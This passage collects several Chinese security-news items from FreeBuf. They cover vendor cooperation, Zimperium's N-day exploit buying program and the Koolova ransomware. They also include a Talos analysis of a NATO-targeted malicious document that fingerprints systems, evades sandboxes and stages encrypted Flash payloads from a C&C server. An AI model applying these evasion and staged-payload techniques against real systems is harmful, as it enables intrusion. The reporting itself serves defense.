“回顾整个安全行业的发展史,在不同安全系统之间的交互方面,安全厂商几乎没有给用户提供任何的帮助。实际上,有些人甚至还认为这将对他们的企业构成威胁。但是,安全生态系统正在朝着一体化的趋势发展,很多供应商也知道开发一款独立的安全产品是没有任何意义的。每一个厂商就像一块拼图一样,只有拼凑起来才能成为一张完整的图画。”

英特尔的Samani也认同这一观点,但他也表示并非安全社区的每一个人都是这样想的。他表示:“总体来说,还是有很多厂商不愿意合作的,这完全取决于他们自己,但整个市场和安全社区还是朝着好的方向在发展。”

Clipboard Image.png

威胁情报与数据共享将成主流

实际上,与安全研究相似,威胁情报也是安全厂商可以展开合作的另一领域。之前也有很多合作的例子,比如说网络威胁联盟(CTA)、全球网络联盟(GCA)和威胁防御联盟(TPA)等等。

除此之外,政府和企业之间在威胁情报共享方面的合作也在逐步加深,美国的ISAC和英国的CISP之间的合作就是一个很好的范例。Samani还指出,The No More Ransom项目(旨在彻底消灭勒索软件)已经给安全社区提供了一个非常好的例子,我们也可以看到执法部门、政府机构、以及安全厂商的确可以共同努力来对抗勒索软件威胁

随着行业合作的不断加深,威胁情报共享也将会成为常态。除此之爱,行业标准的出台也会让更多的企业积极加入到威胁数据共享这一大环境之中。类似ICS2、SANS、CREST、ISACA和ISSP这样的机构不仅会促成安全厂商间更广泛的合作,而且也可以改善全球信息安全人才匮乏以及安全技术差距较大的情况

* 参考来源:networkworld, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

1.png

N-day漏洞收购计划问世

成立于2010年的Zimperium是一家致力于开发和设计全球顶尖移动安全技术的以色列信息安全公司,就在几天之前,该公司正式宣布他们将开始收购Android平台和iOS平台的移动端漏洞,而且这些漏洞必须是已经得到修复了的漏洞。就此看来,0-day漏洞并不是他们所感兴趣的内容,他们真正关心的是那些N-day漏洞的利用代码。

Zimperium在当地时间2月1日所举办的新闻发布会上表示,公司将在2017年提供150万美元的总预算来收购Google和苹果移动系统的N-day漏洞利用代码及利用方法。

0-day漏洞的魅力

所谓0-day漏洞,即未知的安全漏洞,这些漏洞既没有被公开,也没有得到厂商的修补。即便是厂商了解到了漏洞的相关信息,研发补丁并修复漏洞也需要大量的时间和精力的投入,因此网络攻击者、国家黑客、以及执法部门就可以在漏洞得到修复之前利用这些0-day漏洞来入侵目标设备。当然了,执法部门的目的可能是为了调查某些违法案件,但网络攻击者的目的可就没人能保证了。

Clipboard Image.png

对于目前最受欢迎的旗舰设备,例如iPhone手机,如果研究人员直接将他们所发现的0-day漏洞私下出售给第三方,而不是将漏洞直接披露给苹果公司的话,那么这些研究人员将可以赚取高达150万美元左右的“奖励”。厂商提供的漏洞奖金远没有黑市商人提供的价格高,这也就纯粹是在考验各位研究人员的“价值观”了。在2016年,安全研究专家成功帮助美国联邦调查局入侵了圣贝纳迪诺枪击案嫌疑人的iPhone手机,而FBI也向研究人员支付了100万美金的奖励

Zimperium的目的

未被修复的漏洞往往是黑市商人以及网络攻击者的最爱,但Zimperium关心的却是N-day漏洞的利用方法。当厂商承认了某个安全问题确实存在,并且正在着手修复这一问题,那么所谓的N-day漏洞其中的N天表示的是:在系统收到更新推送并修复该漏洞之前的时间,在这段时间里存在漏洞的系统仍然有可能遭到攻击。

Zimperium公司表示:

“如果我们购买0-day漏洞的话,就算厂商及时开发出了相应的修复补丁,由于漏洞部署方案中存在的各种问题,很多移动设备可能永远无法接收到补丁推送,这就导致数以百万计的用户仍然处于安全风险之中。

通过将工作重心转移到N-day漏洞或者是已修复的漏洞之上,Zimperium可以直接向移动生态系统“施加压力”,并让厂商重新去思考如何更好地让用户接收并安装安全更新补丁。

除此之外,我们的漏洞收购计划只会对那些真正付出了辛勤劳动的攻击者提供奖励。”

Zimperium的研究团队zLabs将会负责评估提交上来的N-day漏洞(包括本地漏洞和远程漏洞),如果zLabs的研究专家可以复现漏洞,并利用该漏洞成功攻击旧款设备和操作系统,那么他们将会给提交漏洞的研究专家提供漏洞报价。

如果他们接受了Zimperium的报价,那么漏洞信息将会公布给Zimperium的手机联盟(ZHA)成员,该联盟成员既包括像三星、软银、黑莓和特斯拉这样的科技巨头,也包括其他三十多家手机生产商。漏洞信息之所以要与这些第三方厂商共享,主要是因为他们都希望提高移动设备安全漏洞的修复速度,并最大程度地保障用户的信息安全。随后,Zimperium将会在一至三个月后公开漏洞利用细节,漏洞信息还将会被用于Zimperium z9威胁检测引擎之中。

Zimperium的创始人兼首席技术官Zuk Avraham表示:

“不幸的是,针对移动设备操作系统的安全修复过程是极其缓慢的,这将会使得移动设备和用户同时暴露在十几种安全威胁之下。

通过这个计划,我们的客户、合作伙伴、以及信息安全社区的研究人员都将会获取到漏洞信息以及相应的漏洞利用方法,所以我们就可以根据这些信息更好地为用户提供安全保护服务了。”

* 参考来源:zdnet, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

Clipboard Image.png

勒索软件折磨我们已经有些年头了,但是在这最近的两年里,勒索软件已经迅速发展成为了政府机构、商务企业和用户所面临的最严重的安全威胁之一,而这种发展趋势在2017年也丝毫不会减弱。勒索软件的开发者是非常富有创造力的,他们会在自己的勒索软件中加入最新的网络攻击方法,并且采用极其复杂的自我保护技术来避免安全防护软件的检测。

Koolova新奇的之处

勒索软件是恶意软件的一种,它会使用非常健壮的加密算法来对你设备中的文件进行加密,然后要求你以比特币的形式支付数据赎金。在支付了赎金之后,你才能获取到解密文件的密钥,否则你可能永远无法重新访问到你的文件了。

现在,安全研究专家又发现了一种新型的勒索软件,这款名为Koolova的勒索软件再一次将勒索软件推上了一个新的高度。需要注意的是,它可以允许用户免费恢复自己被加密的文件,这一特性与Popcorn Time勒索软件非常相似。但与之不同的是,Koolova并不需要这位用户再去感染其他的用户。

如果你不幸感染了Koolova,你所要做的就是接受教育,阅读两篇关于网络安全意识的文章,好好学习一下勒索软件的相关知识,并且了解如何能够更好地避免感染勒索软件。学习完成之后,你就可以解锁你的文件了。大家都知道,勒索软件通常会直接给用户提供一个如何支付赎金的“手把手教程”,但Koolova则需要被感染用户有一定的技术知识才可以找到这个页面。

Koolova勒索软件要求用户阅读的两篇文章如下:

1.    Google安全博客的《Stay safe while browsing》;

2.    BleepingComputer的《Jigsaw Ransomware Decrypted: Will delete your files until you pay the Ransom

Clipboard Image.png

简单分析Koolova

据了解,这款勒索软件最初是由安全研究专家MichaelGillespie发现的,并由BleepingComputer首次报道。经过分析发现,Koolova勒索软件中的代码并非专业程序员编写的,而且其中很多模块函数和代码仍未完善,因此专家认为Koolova目前仍处于开发阶段。

Clipboard Image.png

Koolova在成功感染用户设备之后,它会对目标系统中的文件进行加密,并且让用户打开并阅读两篇技术文章,阅读完之后就可以免费获取解密密钥了。

如果你懒得读这两篇文章的话,Koolova会设置一个倒数计时器,时间一到,它便会将你设备中的被加密文件全部删除,这一点与恶意软件Jigsaw十分相似。

当你阅读完这两篇文章之后,就可以直接点击勒索信息页面中的“Decriptai Miei File”(意大利语)按钮来解锁文件了。点击之后,Koolova会自动与远程C&C服务器进行连接,并向用户提供解密密钥,将密钥输入至密码框之后就可以解锁文件啦!

总结

虽然这种勒索软件并不是为了给用户造成损失,而且攻击者也没有想通过它来获取非法受益,但是这种行为在某些国家依然是一种违法行为。

* 参考来源:SecurityAffairsthehackernews,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

1.png

概述

近期,Talos的安全研究专家发现了一种恶意的Word文档,这种恶意文档不仅拥有很多特殊的功能,而且其工作机制也非常的先进。它可以对目标系统执行数据嗅探和踩点侦查,可以躲避安全产品的沙箱检测和虚拟分析,而且还可以利用非嵌入式的Flash payload来触发目标系统中的漏洞。

安全研究专家表示,攻击者在2016年圣诞节以及2017年新年假期的这段时间里,利用这种恶意文档对北约成员国的用户发动了大规模的网络攻击。在对恶意文档的文件名进行了分析之后,Talos的研究专家认为这种恶意文档针对的是北约成员国的政府部门。

2.png

层层嵌套的恶意文档

研究人员获取到的分析样本是一个RTF文档,而该文档中嵌入了大量的对象。第一个嵌入的对象是一个OLE对象。下图所示即为该Office文档中所包含的OLE对象:

3.png

研究人员发现,这个OLE对象中还包含一个AdobeFlash对象,这个AdobeFlash对象的目的就是通过执行ActionScript脚本来提取出嵌入在恶意文档中的恶意源码。经过分析后发现,这份恶意源码其实又是一个经过二次编码和压缩的AdobeFlash对象,其中的编码算法是基于异或运算实现的,而压缩则采用的是zlib库。

Payload的分析

与攻击payload有关的部分主要在其ActionScript脚本之中,攻击者首先在脚本中对C&C服务器进行了简单的配置,并且在一个全局变量中设置了C&C服务器的URL地址:

4.png

第一步:

这个ActionScript脚本所要做的第一件事就是向远程C&C服务器发送一个HTTP请求,请求信息如下图所示:

5.png

我们可以看到,其中的URI为“/nato”,这正好与恶意文档的命名模式相同。

思科Umbrella云安全解决方案可以帮助用户识别与该C&C服务器有关的DNS流量。下面这张截图是思科Umbrella给出的监测数据, 2016年12月29日至2017年1月12日之间的是恶意C&C服务器原本的每小时DNS查询请求情况,而从1月16日开始出现的大量请求基本上都是由安全研究专家发送的。

6.png

恶意脚本首先通过falsh.system.Capabilities.serverString API来获取到目标系统的基本信息,然后在通过恶意请求将这些信息发送给攻击者。根据Adobe提供的官方文档,这个API允许开发人员获取到目标系统中AdobeFlash的兼容版本信息。下面是文档中给出的查询示例代码:

A=t&SA=t&SV=t&EV=t&MP3=t&AE=t&VE=t&ACC=f&PR=t&SP=t&SB=f&DEB=t&V=WIN%209%2C0%2C0%2C0&M=Adobe%20Windows&R=1600x1200&DP=72&COL=color&AR=1.0&OS=Windows%20XP&L=en&PT=ActiveX&AVD=f&LFD=f&WD=f&IME=t&DD=f&DDP=f&DTS=f&DTE=f&DTH=f&DTM=f

这条查询可以允许攻击者获取到与目标设备有关的信息,包括操作系统版本和AdobeFlash版本。接下来,攻击者就可以利用这些信息来推测和判断出目标用户的个人喜好等等。如果受感染系统是沙箱系统或是虚拟机的话,攻击者就可以忽略这个请求并终止ActionScript脚本的运行。

第二步:

ActionScript脚本会将第一个查询请求的响应结果保存在一个名为“vars”的变量中。接下来,它便会用另一个URI来执行第二个HTTP请求:

7.png

如果服务器成功响应了上述代码中的初始请求,那么函数expLoaded()(用于加载漏洞利用代码)将会被执行。

第三步:

之前那些请求的响应结果会存储在swf变量中,这些数据都是以经过加密的AdobeFlash对象(swf)的形式来进行存储的。接下来,ActionScript脚本会执行unpack()函数来解密下载下来的swf文件,这个函数需要swf对象和第一个请求所得到的“k3”密钥作为输入参数。

8.png

在这一步骤中,ActionScript会执行第三次HTTP请求:

9.png

如果请求成功,那么函数payLoaded()将会被调用,而攻击payload将会被加载。

第四步:

需要注意的是,之前的请求结果中包含有一个经过编码的payload,ActionScript脚本会使用相同的unpack()函数和另一个密钥“k4”(在初始请求中获取到的)来对这个payload进行解码。最终,攻击者就可以利用flash.dispaly.Loader()API来执行下载下来的恶意AdobeFlash文件了。

10.png

陷阱!

正如我们在文章中提到的一样,调查数据显示目前已经有很多的安全研究人员正在调查攻击者的域名,而研究人员发现,攻击者最近似乎对恶意payload进行了修改,并且试图通过返回一堆垃圾数据来干扰研究人员的调查活动。

11.png

总结

在对这个恶意Office文档进行了深入分析之后,我们也了解到了一种新型且先进的恶意感染流程。首先,恶意文档会对目标设备进行踩点侦查,以此来避免与沙箱系统或虚拟机系统进行通信。接下来,AdobeFlash会向远程服务器请求下载一个payload,然后攻击者再利用目标设备中的Flash漏洞来加载payload,并进行远程攻击。这是一种非常聪明的方法,从攻击者的角度来看,漏洞利用代码并非直接嵌入在恶意文档之中的,所以安全防护工具就更加难以检测到它们了。更重要的是,攻击者已经意识到了安全研究人员正在对他们进行调查,所以攻击者也做出了应对。

如何保护自己的安全?

广大用户可以使用下图所示的产品来保护自己的设备安全。

12.png

Hash:

ffd5bd7548ab35c97841c31cf83ad2ea5ec02c741560317fc9602a49ce36a763

7c25a5cd3684c470066291e4dec7d706270a5392bc4f907d50b6a34ecb793f5b

* 参考来源:talosintel, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

现在,无论是商业软件还是程序员自行开发的小程序,开源代码已经变得越来越普遍了,而开源似乎也已经成为了一种趋势。但需要注意的是,Black Duck软件公司的研究人员根据他们对开源项目所收集到的统计数据预测到,基于开源软件漏洞的网络攻击活动数量在2017年将增长20%。

2.png

Black Duck软件公司的安全策略副总裁Mike Pittenger表示,商业软件项目的免费版本数量已经超过了50%甚至更多,而开源软件产品所占比重从2011年的3%增长到了现在的33%。平均每一款商业软件都会使用超过100个开源组件,而且三分之二的商业应用代码中已知是存在安全漏洞的。

最糟糕的是,买家和用户通常都没有办法知道他们所购买的产品使用了哪些开源组件。一般来说,公司在这一方面做的都不是很到位,有些公司可能会给客户提供一份产品组件清单,但这些清单所名列出的组件数量和类型往往是不完整的。如果你打算在没有得到厂商允许的情况下对产品代码进行分析,那么你很有可能会违反他们的产品许可协议,而这将会给你带来一大堆麻烦,所以我们不建议用户这样做。但是由于行业地位和影响力等因素,某些大型企业在购买第三方软件产品时会要求厂商提供产品的完整技术细节,并且还会请类似Black Duck这样的第三方厂商来对产品代码进行安全审查。

Pittenger认为,避免使用开源软件其实并不可取。很多开源代码库的开发是完全符合行业标准的,而重复造车轮绝对是在浪费时间,这样不仅会延迟产品的上市时间,而且还会使公司的行业竞争力大大降低。因此,越来越多的商业软件开发商会开始在自己的产品中使用开源代码,而这种趋势目前正在加速发展。

目前,任何一个活跃的开源项目背后都有社区的积极支持,而这将会给这款产品带来可靠的安全保证和稳定的功能更新。在某些情况下,如何某款产品允许用户自行对软件源码进行安全审计,或者可以对该产品进行高度定制,那么将会对产品的安全性提升有很大的帮助。就我们的经验来看,如果某一款商业工具可以做到这件事情的话,那么肯定会有相应的开源工具可以做到同样的事情。

但是,这种“多渠道”的漏洞检查方法并不总是百分之百有效的,仍然会有很多开源代码中的漏洞会成为漏网之鱼。

AlienVault公司的安全顾问Javvad Malik表示:

“任何人都可以对代码进行审计,但并非每个人都会这样做,因为似乎每一个人都认为其他人已经对这些代码进行过安全审查了,这也就是问题之所在。”

因此,管理开源组件的问题已经成为了一个非常棘手的问题,而且网络犯罪分子们似乎也已经意识到了这一点,并逐渐开始利用我们的这一薄弱点来实施攻击。

在目前的互联网中,开源代码几乎无处不在,所以攻击者只需要利用一个漏洞就可以攻击大量的目标。对开源代码的追踪其实是非常困难的,隐私用户通常无法对产品中的开源代码进行及时地修复和更新,所以攻击者就可以利用很多已知的漏洞和安全研究专家所发布的漏洞PoC来实施攻击。

除此之外,物联网在去年也得到了非常迅速的发展,而物联网设备的安全性也成为了目前的一个令人头疼的问题。毫无疑问,这个问题在2017年仍将困扰着我们。

Malik认为,现在很多智能设备和物联网设备都会使用大量的开源工具,而臭名昭著的Mirai僵尸网络就是一个很好的例证。

3.png

与此同时,开发人员通常都不会去检测开源代码中的安全漏洞,而且有时候迫于产品开发期限的压力,他们明知代码中存在安全问题,却仍然选择直接使用它们。这也就意味着,即便是开源项目的维护人员及时发布了更新,外面也仍然存在很多未打补丁的产品。当你的新产品使用了旧版本的开源组件时,你的新产品中也会存在已知的安全漏洞。而且据统计数据显示,商业软件项目中的安全漏洞平均年龄为五年,有些产品中的某一漏洞甚至存在了有十年之久。

OpenSSL代码库中的Heartbleed漏洞在2014年初被发现,而该漏洞的曝光也引起了业界的广泛关注。但是在去年,仍然有10%左右的应用软件正在使用包含漏洞的OpenSSL版本。而且Pittenger表示,安全研究专家平均每一年都可以在开源软件中找出2000到4000个安全漏洞。

解决这个问题则需要软件厂商和广大客户的共同努力,而且企业的软件开发人员也需要培养良好的安全意识。但我们应该做好心理准备,因为在情况好转之前,目前的安全状况只会变得更加糟糕。

* 参考来源:csoonline, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM